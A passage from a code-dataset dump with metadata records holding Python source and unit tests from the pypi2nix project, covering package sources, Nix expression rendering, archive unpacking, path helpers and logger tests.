tempfile.TemporaryDirectory() as project_directory:\n requirements_file = RequirementsFile(\n include_path, project_directory, requirement_parser, logger\n )\n requirements_file.process()\n return constructor.from_file(\n requirements_file, target_platform, requirement_parser, logger\n )\n else:\n return constructor(target_platform)\n" }, { "alpha_fraction": 0.6351351141929626, "alphanum_fraction": 0.6434511542320251, "avg_line_length": 35.30188751220703, "blob_id": "5ce8f0186cb1c739d284996d50b0993f68db8084", "content_id": "1ec0ca078702c2c29c8692a271b66f794fb472ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1924, "license_type": "no_license", "max_line_length": 84, "num_lines": 53, "path": "/scripts/package_source.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Optional\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.utils import prefetch_git\nfrom pypi2nix.wheels import Index\n\n\nclass PackageSource:\n def __init__(self, index: Index, pypi: Pypi, logger: Logger):\n self.index = index\n self.pypi = pypi\n self.logger = logger\n\n def update_package_from_master(self, package_name: str) -> None:\n url = self._get_url_for_package(package_name)\n if url is None:\n self._log_no_update_warning(package_name)\n return\n repo_data = prefetch_git(url)\n self.index[package_name] = Index.GitEntry(\n url=repo_data[\"url\"], rev=repo_data[\"rev\"], sha256=repo_data[\"sha256\"],\n )\n self._log_update_success(package_name)\n\n def update_package_from_pip(self, package_name: str) -> None:\n package = self.pypi.get_package(package_name)\n source_release = self.pypi.get_source_release(\n name=package_name, version=package.version\n )\n if source_release is None:\n self._log_no_update_warning(package_name)\n return\n self.index[package_name] = Index.UrlEntry(\n url=source_release.url, sha256=source_release.sha256_digest\n )\n self._log_update_success(package_name)\n\n def _get_url_for_package(self, package_name: str) -> Optional[str]:\n return SOURCE_BY_PACKAGE_NAME.get(package_name)\n\n def _log_no_update_warning(self, package_name: str) -> None:\n self.logger.warning(f\"Could not update source for package `{package_name}`\")\n\n def _log_update_success(self, package_name: str) -> None:\n self.logger.info(f\"Successfully updated package `{package_name}`\")\n\n\nSOURCE_BY_PACKAGE_NAME = {\n \"pip\": \"https://github.com/pypa/pip.git\",\n \"setuptools\": \"https://github.com/pypa/setuptools.git\",\n \"wheel\": \"https://github.com/pypa/wheel.git\",\n}\n" }, { "alpha_fraction": 0.7296000123023987, "alphanum_fraction": 0.7322666645050049, "avg_line_length": 28.761905670166016, "blob_id": "11530bb54cb9d2ab81c463abe4e6fc0a989d74e5", "content_id": "7c49ac2ed8fd720f6805c2af82c9e6ce61f7e80d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1875, "license_type": "permissive", "max_line_length": 81, "num_lines": 63, "path": "/unittests/pip/test_install.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\n\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom ..switches import nix\n\n\n@nix\ndef test_install_six_yields_non_empty_freeze_output(\n pip: Pip,\n project_dir: str,\n 
download_dir: Path,\n current_platform: TargetPlatform,\n requirement_parser,\n):\n lib_dir = Path(os.path.join(project_dir, \"lib\"))\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n pip.download_sources(requirements, download_dir)\n pip.install(\n requirements, source_directories=[download_dir], target_directory=lib_dir\n )\n assert pip.freeze([lib_dir])\n\n\n@nix\ndef test_install_to_target_directory_does_not_install_to_default_directory(\n pip: Pip,\n project_dir: str,\n download_dir: Path,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n):\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n target_directory = Path(project_dir) / \"target-directory\"\n target_directory.ensure_directory()\n pip.download_sources(requirements, download_dir)\n\n assert not target_directory.list_files()\n\n pip.install(\n requirements,\n source_directories=[download_dir],\n target_directory=target_directory,\n )\n\n assert target_directory.list_files()\n\n\n@nix\ndef test_install_does_not_install_anything_with_empty_requirements(\n pip: Pip, project_dir: str, current_platform: TargetPlatform\n):\n target_directory = Path(project_dir) / \"target_dir\"\n target_directory.ensure_directory()\n pip.install(RequirementSet(current_platform), [], target_directory)\n assert not target_directory.list_files()\n" }, { "alpha_fraction": 0.567345917224884, "alphanum_fraction": 0.5730616450309753, "avg_line_length": 30.685039520263672, "blob_id": "e27aefc16afe64a07d46be3d90049782af67c749", "content_id": "539407487dbba3c46b29e785ae4e05a15de698b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4024, "license_type": "no_license", "max_line_length": 92, "num_lines": 127, "path": "/src/pypi2nix/overrides.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import urllib\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom typing import Dict\nfrom typing import Optional\nfrom typing import no_type_check\nfrom urllib.parse import urldefrag\nfrom urllib.parse import urlparse\n\nimport click\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.network_file import DiskTextFile\nfrom pypi2nix.network_file import GitTextFile\nfrom pypi2nix.network_file import NetworkFile\nfrom pypi2nix.network_file import UrlTextFile\n\nfrom .utils import prefetch_github\n\n\nclass UnsupportedUrlError(Exception):\n pass\n\n\nclass Overrides(metaclass=ABCMeta):\n @abstractmethod\n def nix_expression(self, logger: Logger) -> str:\n pass\n\n\nclass OverridesNetworkFile(Overrides):\n def __init__(self, network_file: NetworkFile) -> None:\n self._network_file = network_file\n\n def nix_expression(self, logger: Logger) -> str:\n return f\"import ({self._network_file.nix_expression()}) {{ inherit pkgs python ; }}\"\n\n\nclass OverridesGithub(Overrides):\n def __init__(\n self, owner: str, repo: str, path: str, rev: Optional[str] = None\n ) -> None:\n self.owner = owner\n self.repo = repo\n self.path = path\n self.rev = rev\n\n def nix_expression(self, logger: Logger) -> str: # noqa: U100\n prefetch_data = prefetch_github(self.owner, self.repo, self.rev)\n template = \" \".join(\n [\n \"let src = pkgs.fetchFromGitHub {{\",\n 'owner = \"{owner}\";',\n 'repo = \"{repo}\";',\n 'rev = \"{rev}\";',\n 'sha256 = \"{sha256}\";',\n \"}} ;\",\n 'in import \"${{src}}/{path}\" {{',\n \"inherit pkgs 
python;\",\n \"}}\",\n ]\n )\n return template.format(\n owner=self.owner,\n repo=self.repo,\n rev=prefetch_data[\"rev\"],\n sha256=prefetch_data[\"sha256\"],\n path=self.path,\n )\n\n\nclass NetworkFileParameter(click.ParamType):\n name = \"url\"\n\n @no_type_check\n def convert(self, value, param, ctx):\n try:\n return self._url_to_network_file(value)\n except UnsupportedUrlError as e:\n self.fail(str(e), param, ctx)\n\n def _url_to_network_file(self, url_string: str) -> NetworkFile:\n url = urlparse(url_string)\n if url.scheme == \"\":\n return DiskTextFile(url.path)\n elif url.scheme == \"file\":\n return DiskTextFile(url.path)\n elif url.scheme == \"http\" or url.scheme == \"https\":\n return UrlTextFile(url.geturl(), StreamLogger.stdout_logger())\n elif url.scheme.startswith(\"git+\"):\n return self._handle_git_override_url(url, url_string)\n else:\n raise UnsupportedUrlError(\n \"Cannot handle common overrides url %s\" % url_string\n )\n\n def _handle_git_override_url(\n self, url: urllib.parse.ParseResult, url_string: str\n ) -> GitTextFile:\n if not url.fragment:\n raise UnsupportedUrlError(\n (\n \"Cannot handle overrides with no path given, offending url was\"\n \" {url}.\"\n ).format(url=url_string)\n )\n fragments: Dict[str, str] = dict()\n for fragment_item in url.fragment.split(\"&\"):\n try:\n fragment_name, fragment_value = fragment_item.split()\n except ValueError:\n raise UnsupportedUrlError(\n f\"Encountered deformed URL fragment `{fragment_item}` \"\n f\"in url `{url_string}`\"\n )\n else:\n fragments[fragment_name] = fragment_value\n return GitTextFile(\n repository_url=urldefrag(url.geturl()[4:])[0],\n path=fragments[\"path\"],\n revision_name=fragments.get(\"rev\", \"master\"),\n logger=StreamLogger.stdout_logger(),\n )\n\n\nFILE_URL = NetworkFileParameter()\n" }, { "alpha_fraction": 0.5744863152503967, "alphanum_fraction": 0.5783390402793884, "avg_line_length": 34.39393997192383, "blob_id": "1a169c0d1e381f538175b7ed12bcd11f759f3455", "content_id": "bb455ef7c1890d0c3d5648df9708c169085a55f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4672, "license_type": "no_license", "max_line_length": 88, "num_lines": 132, "path": "/src/pypi2nix/expression_renderer.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport shlex\nimport sys\nfrom typing import Dict\nfrom typing import Iterable\n\nimport jinja2\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.nix_language import escape_string\nfrom pypi2nix.overrides import Overrides\nfrom pypi2nix.python_version import PythonVersion\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.version import pypi2nix_version\nfrom pypi2nix.wheel import Wheel\n\nHERE = os.path.dirname(__file__)\n\n\ndef render_expression(\n packages_metadata: Iterable[Wheel],\n sources: Sources,\n requirements_name: str,\n requirements_frozen: str,\n extra_build_inputs: Iterable[str],\n enable_tests: bool,\n python_version: PythonVersion,\n target_directory: str,\n logger: Logger,\n target_platform: TargetPlatform,\n common_overrides: Iterable[Overrides] = [],\n) -> None:\n \"\"\"Create Nix expressions.\n \"\"\"\n\n default_file = os.path.join(target_directory, f\"{requirements_name}.nix\")\n overrides_file = os.path.join(target_directory, f\"{requirements_name}_override.nix\")\n frozen_file = os.path.join(target_directory, f\"{requirements_name}_frozen.txt\")\n\n metadata_by_name: Dict[str, Wheel] = {x.name: 
x for x in packages_metadata}\n\n generated_packages_metadata = []\n for item in sorted(packages_metadata, key=lambda x: x.name):\n if item.build_dependencies:\n buildInputs = \"\\n\".join(\n sorted(\n [\n ' self.\"{}\"'.format(dependency.name())\n for dependency in item.build_dependencies(target_platform)\n ]\n )\n )\n buildInputs = \"[\\n\" + buildInputs + \"\\n ]\"\n else:\n buildInputs = \"[ ]\"\n propagatedBuildInputs = \"[ ]\"\n dependencies = item.dependencies(extras=[])\n if dependencies:\n deps = [\n x.name() for x in dependencies if x.name() in metadata_by_name.keys()\n ]\n if deps:\n propagatedBuildInputs = \"[\\n%s\\n ]\" % (\n \"\\n\".join(\n sorted(\n [\n ' self.\"%s\"' % (metadata_by_name[x].name)\n for x in deps\n if x != item.name\n ]\n )\n )\n )\n source = sources[item.name]\n fetch_expression = source.nix_expression()\n package_format = item.package_format\n generated_packages_metadata.append(\n dict(\n name=item.name,\n version=item.version,\n fetch_expression=fetch_expression,\n buildInputs=buildInputs,\n propagatedBuildInputs=propagatedBuildInputs,\n homepage=item.homepage,\n license=item.license,\n description=escape_string(item.description),\n package_format=package_format,\n )\n )\n\n templates = jinja2.Environment(loader=jinja2.FileSystemLoader(HERE + \"/templates\"))\n\n generated_template = templates.get_template(\"generated.nix.j2\")\n generated = \"\\n\\n\".join(\n generated_template.render(**x) for x in generated_packages_metadata\n )\n\n overrides = templates.get_template(\"overrides.nix.j2\").render()\n\n common_overrides_expressions = [\n \" (\" + override.nix_expression(logger) + \")\" for override in common_overrides\n ]\n\n default_template = templates.get_template(\"requirements.nix.j2\")\n overrides_file_nix_path = os.path.join(\".\", os.path.split(overrides_file)[1])\n default = default_template.render(\n version=pypi2nix_version,\n command_arguments=\" \".join(map(shlex.quote, sys.argv[1:])),\n python_version=python_version.derivation_name(),\n extra_build_inputs=(\n extra_build_inputs\n and \"with pkgs; [ %s ]\" % (\" \".join(extra_build_inputs))\n or \"[]\"\n ),\n overrides_file=overrides_file_nix_path,\n enable_tests=str(enable_tests).lower(),\n generated_package_nix=generated,\n common_overrides=\"\\n\".join(common_overrides_expressions),\n python_major_version=python_version.major_version(),\n )\n\n if not os.path.exists(overrides_file):\n with open(overrides_file, \"w+\") as f:\n f.write(overrides.strip())\n logger.info(\"|-> writing %s\" % overrides_file)\n\n with open(default_file, \"w+\") as f:\n f.write(default.strip())\n\n with open(frozen_file, \"w+\") as f:\n f.write(requirements_frozen)\n" }, { "alpha_fraction": 0.6144975423812866, "alphanum_fraction": 0.6161449551582336, "avg_line_length": 30.947368621826172, "blob_id": "55fe615bee407e92ec7a2cb7faa87203e0a624c3", "content_id": "a8ac33db1b83a39d5fae2ab9e08ae25d3360e9c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1214, "license_type": "no_license", "max_line_length": 79, "num_lines": 38, "path": "/src/pypi2nix/archive.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import tarfile\nimport tempfile\nimport zipfile\nfrom contextlib import contextmanager\nfrom typing import Iterator\n\n\nclass UnpackingFailed(Exception):\n pass\n\n\nclass Archive:\n def __init__(self, path: str) -> None:\n self.path = path\n\n @contextmanager\n def extracted_files(self) -> Iterator[str]:\n with 
tempfile.TemporaryDirectory() as directory:\n self.unpack_archive(directory)\n yield directory\n\n def unpack_archive(self, target_directory: str) -> None:\n if self.path.endswith(\".tar.gz\"):\n with tarfile.open(self.path, \"r:gz\") as tar:\n tar.extractall(path=target_directory)\n elif self.path.endswith(\".zip\") or self.path.endswith(\".whl\"):\n with zipfile.ZipFile(self.path) as archive:\n archive.extractall(path=target_directory)\n elif self.path.endswith(\".tar.bz2\"):\n with tarfile.open(self.path, \"r:bz2\") as tar:\n tar.extractall(path=target_directory)\n else:\n raise UnpackingFailed(\n \"Could not detect archive format for file {}\".format(self.path)\n )\n\n def __str__(self) -> str:\n return f\"Archive<path={self.path}>\"\n" }, { "alpha_fraction": 0.6970587968826294, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 36.77777862548828, "blob_id": "edd6e89217318d9a834f0e15ba222bd3776c5ac7", "content_id": "8fca489f50602b9fed9632e6a0151a8b6766e4ca", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "permissive", "max_line_length": 75, "num_lines": 9, "path": "/unittests/test_environment_marker.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.environment_marker import EnvironmentMarker\n\n\n@pytest.mark.parametrize(\"operator\", (\"<\", \"<=\", \"==\", \"!=\", \">\", \">=\"))\ndef test_that_version_comparisons_do_not_throw(operator, current_platform):\n marker = EnvironmentMarker(f\"python_version {operator} '1.0'\")\n marker.applies_to_platform(current_platform)\n" }, { "alpha_fraction": 0.7243027687072754, "alphanum_fraction": 0.728286862373352, "avg_line_length": 30.375, "blob_id": "dc03790ec9902045cdcac283a78fa5d0f414e78b", "content_id": "88f4a786bada21b8a90cb6e1e33c034d574dd759", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1255, "license_type": "permissive", "max_line_length": 84, "num_lines": 40, "path": "/unittests/pip/test_wheel.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom ..switches import nix\n\n\n@nix\ndef test_pip_can_install_wheels_previously_downloaded(\n pip: Pip,\n project_dir: str,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n download_dir: Path,\n wheels_dir: Path,\n):\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n pip.download_sources(requirements, download_dir)\n pip.build_wheels(\n requirements=requirements,\n source_directories=[download_dir],\n target_directory=wheels_dir,\n )\n assert wheels_dir.list_files()\n assert any(map(lambda x: x.endswith(\".whl\"), wheels_dir.list_files()))\n\n\n@nix\ndef test_pip_wheel_does_not_build_wheels_if_requirements_are_empty(\n pip: Pip, wheels_dir: Path, download_dir: Path, current_platform: TargetPlatform\n):\n pip.build_wheels(\n requirements=RequirementSet(current_platform),\n target_directory=wheels_dir,\n source_directories=[download_dir],\n )\n assert not wheels_dir.list_files()\n" }, { "alpha_fraction": 0.5683736801147461, "alphanum_fraction": 0.5790658593177795, "avg_line_length": 21.212499618530273, "blob_id": 
"5291679f2570bcef303f558b46160d20e09500dd", "content_id": "fe76a94ec4797d6a8066f4608948d24463320c60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1777, "license_type": "no_license", "max_line_length": 84, "num_lines": 80, "path": "/scripts/install_test.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport os.path\nimport shutil\nimport subprocess\n\nfrom pypi2nix.version import pypi2nix_version\n\n\ndef main():\n set_up_environment()\n create_virtual_env()\n create_sdist()\n install_sdist()\n run_help_command()\n create_virtual_env()\n create_wheel()\n install_wheel()\n run_help_command()\n\n\ndef set_up_environment():\n os.putenv(\"SOURCE_DATE_EPOCH\", \"315532800\")\n os.unsetenv(\"PYTHONPATH\")\n\n\ndef create_sdist():\n shutil.rmtree(os.path.join(\"src\", \"pypi2nix.egg-info\"), ignore_errors=True)\n subprocess.run([\"build/venv/bin/python\", \"setup.py\", \"sdist\"], check=True)\n\n\ndef create_virtual_env():\n os.makedirs(\"build\", exist_ok=True)\n try:\n shutil.rmtree(\"build/venv\")\n except FileNotFoundError:\n pass\n subprocess.run([\"python\", \"-m\", \"venv\", \"build/venv\"], check=True)\n\n\ndef create_wheel():\n shutil.rmtree(os.path.join(\"src\", \"pypi2nix.egg-info\"), ignore_errors=True)\n subprocess.run(\n [\"build/venv/bin/python\", \"-m\", \"pip\", \"install\", \"wheel\"], check=True\n )\n subprocess.run([\"build/venv/bin/python\", \"setup.py\", \"bdist_wheel\"], check=True)\n\n\ndef install_sdist():\n subprocess.run(\n [\n \"build/venv/bin/python\",\n \"-m\",\n \"pip\",\n \"install\",\n f\"dist/pypi2nix-{pypi2nix_version}.tar.gz\",\n ],\n check=True,\n )\n\n\ndef install_wheel():\n subprocess.run(\n [\n \"build/venv/bin/python\",\n \"-m\",\n \"pip\",\n \"install\",\n f\"dist/pypi2nix-{pypi2nix_version}-py3-none-any.whl\",\n ],\n check=True,\n )\n\n\ndef run_help_command():\n subprocess.run([\"build/venv/bin/pypi2nix\", \"--help\"], check=True)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7006802558898926, "alphanum_fraction": 0.7100340127944946, "avg_line_length": 34.6363639831543, "blob_id": "56dec68ca3f77d2119f37a2fa67048093163d945", "content_id": "b5711984dcebf4a25e3656e6e5e908633caf3e10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1176, "license_type": "no_license", "max_line_length": 86, "num_lines": 33, "path": "/integrationtests/test_dependency_graph.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.requirement_parser import RequirementParser\n\nfrom .framework import IntegrationTest\n\n\nclass DependencyGraphOutputTestCase(IntegrationTest):\n name_of_testcase = \"dependency_graph\"\n requirements = [\"django == 3.0.5\"]\n\n def check_dependency_graph(\n self, dependency_graph: DependencyGraph, requirement_parser: RequirementParser\n ):\n self.assertTrue(\n dependency_graph.is_runtime_dependency(\n requirement_parser.parse(\"django\"), requirement_parser.parse(\"pytz\"),\n )\n )\n\n\nclass DependencyGraphInputTestCase(IntegrationTest):\n \"\"\"This class checks behavior if the user supplies a dependency graph\n when running pypi2nix.\n\n Normally requests should not come with django. In this test case\n we tell pypi2nix that requests is a dependecy of django. 
After\n running pypi2nix nix we check if requests was also installed.\n \"\"\"\n\n name_of_testcase = \"dependency_graph_input\"\n requirements = [\"django == 3.0.5\"]\n dependency_graph = {\"django\": {\"runtimeDependencies\": [\"requests\"]}}\n code_for_testing = [\"import requests\"]\n" }, { "alpha_fraction": 0.5759539008140564, "alphanum_fraction": 0.5759539008140564, "avg_line_length": 26.235294342041016, "blob_id": "728476759ee251090b19ed3c3f93fd68c4fd49b5", "content_id": "283889102178f548a76d25ae13812070d18d694a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1389, "license_type": "no_license", "max_line_length": 69, "num_lines": 51, "path": "/src/pypi2nix/path.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport os\nimport os.path\nimport pathlib\nfrom typing import List\nfrom typing import Union\n\n\nclass Path:\n def __init__(self, path: Union[pathlib.Path, str, Path]) -> None:\n self._path: pathlib.Path\n if isinstance(path, str):\n self._path = pathlib.Path(path)\n elif isinstance(path, pathlib.Path):\n self._path = path\n else:\n self._path = path._path\n\n def list_files(self) -> List[Path]:\n return list(map(lambda f: self / f, os.listdir(str(self))))\n\n def ensure_directory(self) -> None:\n return os.makedirs(self._path, exist_ok=True)\n\n def write_text(self, text: str) -> None:\n self._path.write_text(text)\n\n def endswith(self, suffix: str) -> bool:\n return str(self).endswith(suffix)\n\n def is_file(self) -> bool:\n return os.path.isfile(self._path)\n\n def __truediv__(self, other: Union[str, Path]) -> Path:\n if isinstance(other, str):\n return Path(self._path / other)\n else:\n return Path(self._path / other._path)\n\n def __str__(self) -> str:\n return str(self._path)\n\n def __hash__(self) -> int:\n return hash(self._path)\n\n def __eq__(self, other: object) -> bool:\n if isinstance(other, Path):\n return self._path == other._path\n else:\n return False\n" }, { "alpha_fraction": 0.7369624972343445, "alphanum_fraction": 0.7419945001602173, "avg_line_length": 28.14666748046875, "blob_id": "c807afda7f8d1f1e2240bb61aac265f129c50181", "content_id": "fc3a19466f9a230d320377601db5f24353e34b51", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2186, "license_type": "permissive", "max_line_length": 87, "num_lines": 75, "path": "/unittests/test_wheel.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.wheel import Wheel\n\nfrom .switches import nix\n\n\n@pytest.fixture\ndef wheel(current_platform):\n build_dependencies = RequirementSet(current_platform)\n dependencies = RequirementSet(current_platform)\n return Wheel(\n name=\"test-wheel\",\n version=\"1.0\",\n deps=dependencies,\n homepage=\"https://example.test\",\n license=\"\",\n description=\"description\",\n build_dependencies=build_dependencies,\n target_platform=current_platform,\n )\n\n\n@nix\ndef test_can_create_wheel_from_valid_directory(\n extracted_six_package,\n current_platform,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n Wheel.from_wheel_directory_path(\n extracted_six_package, current_platform, logger, requirement_parser\n 
)\n\n\n@nix\ndef test_can_add_build_dependencies_to_wheel(\n wheel: Wheel,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n):\n build_dependencies = RequirementSet(current_platform)\n build_dependencies.add(requirement_parser.parse(\"dep1\"))\n build_dependencies.add(requirement_parser.parse(\"dep2\"))\n wheel.add_build_dependencies(build_dependencies)\n assert \"dep1\" in wheel.build_dependencies(current_platform)\n assert \"dep2\" in wheel.build_dependencies(current_platform)\n\n\ndef test_that_to_dict_is_json_serializable(wheel: Wheel):\n json.dumps(wheel.to_dict())\n\n\ndef test_that_setupcfg_package_wheel_contains_requests_as_dependency(\n setupcfg_package_wheel: Wheel,\n):\n assert \"requests\" in setupcfg_package_wheel.dependencies()\n\n\ndef test_that_setupcfg_package_wheel_contains_pytest_as_testing_dependency(\n setupcfg_package_wheel: Wheel,\n):\n assert \"pytest\" in setupcfg_package_wheel.dependencies(extras=[\"testing\"])\n\n\ndef test_that_setupcfg_package_wheel_does_not_contain_pytest_as_non_testing_dependency(\n setupcfg_package_wheel: Wheel,\n):\n assert \"pytest\" not in setupcfg_package_wheel.dependencies()\n" }, { "alpha_fraction": 0.7928388714790344, "alphanum_fraction": 0.7962489128112793, "avg_line_length": 40.89285659790039, "blob_id": "510556d329cf81b3e30bd69420c6c46441fb80ab", "content_id": "1ef8e2d0d8301b8d5ba28f0297483885544936e9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1173, "license_type": "permissive", "max_line_length": 84, "num_lines": 28, "path": "/unittests/test_requirement_dependency_retriever.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.external_dependency_collector import RequirementDependencyRetriever\nfrom pypi2nix.requirement_parser import RequirementParser\n\n\ndef test_no_external_dependency_for_empty_dependency_graph(\n requirement_parser: RequirementParser,\n) -> None:\n dependency_graph = DependencyGraph()\n retriever = RequirementDependencyRetriever(dependency_graph)\n requirement = requirement_parser.parse(\"testpackage\")\n assert not retriever.get_external_dependency_for_requirement(requirement)\n\n\ndef test_external_dependencies_from_graph_are_retrieved(\n requirement_parser: RequirementParser,\n) -> None:\n dependency_graph = DependencyGraph()\n requirement = requirement_parser.parse(\"testpackage\")\n external_dependency = ExternalDependency(\"external\")\n dependency_graph.set_external_dependency(\n dependent=requirement, dependency=external_dependency\n )\n retriever = RequirementDependencyRetriever(dependency_graph)\n assert external_dependency in retriever.get_external_dependency_for_requirement(\n requirement\n )\n" }, { "alpha_fraction": 0.7128921151161194, "alphanum_fraction": 0.7190130352973938, "avg_line_length": 26.515789031982422, "blob_id": "15956ce2e741bb73c351b0bce30497b9ae8b3223", "content_id": "015489f780861672755e42fd18f7d7a12f632b50", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5228, "license_type": "permissive", "max_line_length": 87, "num_lines": 190, "path": "/unittests/test_logger.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from io import StringIO\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.logger import 
LoggerNotConnected\nfrom pypi2nix.logger import ProxyLogger\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.logger import Verbosity\nfrom pypi2nix.logger import verbosity_from_int\n\nfrom .logger import get_logger_output\n\n\n@pytest.fixture(params=[\"proxy\", \"stream\"])\ndef logger(request):\n stream = StringIO(\"\")\n stream_logger = StreamLogger(output=stream)\n if request.param == \"stream\":\n return stream_logger\n elif request.param == \"proxy\":\n proxy_logger = ProxyLogger()\n proxy_logger.set_target_logger(stream_logger)\n return proxy_logger\n\n\n@pytest.fixture\ndef unconnected_proxy_logger():\n return ProxyLogger()\n\n\ndef test_can_log_warning(logger: Logger):\n logger.warning(\"test\")\n\n assert \"WARNING: test\" in get_logger_output(logger)\n\n\ndef test_every_line_of_warning_is_prefixed(logger):\n logger.warning(\"line1\\nline2\")\n\n output = get_logger_output(logger)\n assert \"WARNING: line1\" in output\n assert \"WARNING: line2\" in output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.ERROR,))\ndef test_that_logger_with_low_verbosity_level_does_not_emit_warning_logs(\n logger: Logger, level\n):\n logger.set_verbosity(level)\n logger.warning(\"test\")\n\n output = get_logger_output(logger)\n assert \"WARNING\" not in output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.WARNING, Verbosity.INFO, Verbosity.DEBUG))\ndef test_that_logger_with_high_verbosity_level_does_emit_warning_logs(\n logger: Logger, level: Verbosity\n):\n logger.set_verbosity(level)\n logger.warning(\"test\")\n\n output = get_logger_output(logger)\n assert \"WARNING\" in output\n\n\ndef test_can_log_error(logger: Logger):\n logger.error(\"test\")\n\n assert \"ERROR: test\" in get_logger_output(logger)\n\n\ndef test_every_line_of_error_is_prefixed(logger: Logger):\n logger.error(\"line1\\nline2\")\n\n output = get_logger_output(logger)\n assert \"ERROR: line1\" in output\n assert \"ERROR: line2\" in output\n\n\n@pytest.mark.parametrize(\n \"level\", (Verbosity.ERROR, Verbosity.WARNING, Verbosity.INFO, Verbosity.DEBUG)\n)\ndef test_that_logger_always_emits_errors(logger: Logger, level: Verbosity):\n logger.set_verbosity(level)\n logger.error(\"test\")\n\n output = get_logger_output(logger)\n assert \"ERROR\" in output\n\n\ndef test_can_log_info(logger: Logger):\n logger.info(\"test\")\n\n assert \"INFO: test\" in get_logger_output(logger)\n\n\ndef test_every_info_line_is_prefixed(logger: Logger):\n logger.info(\"line1\\nline2\")\n\n output = get_logger_output(logger)\n assert \"INFO: line1\" in output\n assert \"INFO: line2\" in output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.WARNING, Verbosity.ERROR))\ndef test_that_logger_with_low_verbosity_level_does_not_emit_info_logs(\n logger: Logger, level\n):\n logger.set_verbosity(level)\n logger.info(\"test\")\n\n output = get_logger_output(logger)\n assert \"INFO\" not in output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.INFO, Verbosity.DEBUG))\ndef test_that_logger_with_high_verbosity_level_does_emit_info_logs(\n logger: Logger, level: Verbosity\n):\n logger.set_verbosity(level)\n logger.info(\"test\")\n\n output = get_logger_output(logger)\n assert \"INFO\" in output\n\n\ndef test_can_log_debug(logger: Logger):\n logger.debug(\"test\")\n\n assert \"DEBUG: test\" in get_logger_output(logger)\n\n\ndef test_every_debug_line_is_prefixed(logger: Logger):\n logger.debug(\"line1\\nline2\")\n\n output = get_logger_output(logger)\n assert \"DEBUG: line1\" in output\n assert \"DEBUG: line2\" in 
